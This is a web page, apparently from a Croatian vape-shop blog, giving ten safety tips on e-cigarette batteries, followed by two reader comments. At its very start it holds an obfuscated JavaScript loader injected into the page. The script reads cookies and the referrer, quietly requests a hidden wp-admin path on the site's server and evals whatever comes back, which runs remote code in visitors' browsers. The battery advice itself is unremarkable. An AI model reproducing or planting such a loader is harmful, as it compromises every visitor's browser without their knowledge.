;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
baterije za e cigarete

Baterije za e cigaretu

Iako samo o ovoj temi više puta pisao na različite načine, ponukan Vašim upitima dobro bi bilo ukratko ponoviti osnovne preporuke za sigurnosno i dugoročno korištenje baterije za e cigaretu;

1. ne koristite baterije iz raznih “power box” paketa od lap topa električnih bušilica i slično.

2. koristite baterije odgovarajuće amperaže; veći amperi veća sigurnost pogotovo kod mehaničkih modova.

3. izbjegavajte punjenje baterija u modu nego koristite vanjski eksterni punjač.

4. ako već u iznimnim slučajevima punite baterije u modu, ne koristite mod dok je na punjenju, nemojte pariti dok se ne napuni.

5. ne ostavljajte baterije koje se pune bez nadzora.

6. ne punite i ne koristite oštećene baterije, bez obzira radi li se o oštećenju zaštitne folije baterije a pogotovo tijela baterije.

7. oštećeni izolator baterije promjenite sa drugim u najkraćem roku i ne zaboravite izolacijski prsten oko plus pola pri prematanju baterije.

8. baterije za e cigaretu koje nisu u uređaju ne nosite sa sobom i ne odlažite bez zaštitnih kutija za baterije. Pogotovo ne bez zaštitne kutije u džepu sa kovanicama, ključevima i slično!

9. preporučuje se gašenje uređaja sa baterijama oko ih ostavljate na duže vrijeme ili preko noći.

10. stare, neispravne i oštećene baterije bacite u zato predviđene kontejnere. Kontejner ima svaki trgovački centar ili veća trgovina.

Parite zdravo i sigurno uz Vaper Pub ekipu te nas svakako pratite u live streamu petkom na Vaper Pub Youtube kanalu!

Ž.M.

Choose your Reaction!
 • Jedan savjet koji preporucaju strucnjaci je da ako namjeravate baterije ostaviti bez upotrebe duze vrijeme, bilo bi pozeljno da se napune samo do 3.7V (ne do 4.1 ili 4.2V) – razlog tomu je da se cuva kemijski integritet baterije a samim time i optimalna dugovjecnost takve baterije.
  Isto tako ni ostavljati prazne duze vrijeme (ispod 3.0V) jer postoji mogucnost da se isprazne ispod 2.5V i onda ih je skoro pa nemoguce povratiti na nominalnu razinu voltaze.

 • 3. izbjegavajte punjenje baterija u modu nego koristite vanjski eksterni punjač.

  4. ako već u iznimnim slučajevima punite baterije u modu, ne koristite mod dok je na punjenju, nemojte pariti dok se ne napuni.

  Ovo je do neki dan bio slučaj kod mene. Nisam imao punjač za bateriju, pa sam punio istu u uređaju.
  No, nisam koristio mod dok se baterija punila, iako isti podržava pass through. Tempirao sam
  punjenje baterije u vrijeme kad bih išao na spavanje, pa nije bilo nikakvih problema s time ;)

Leave a Comment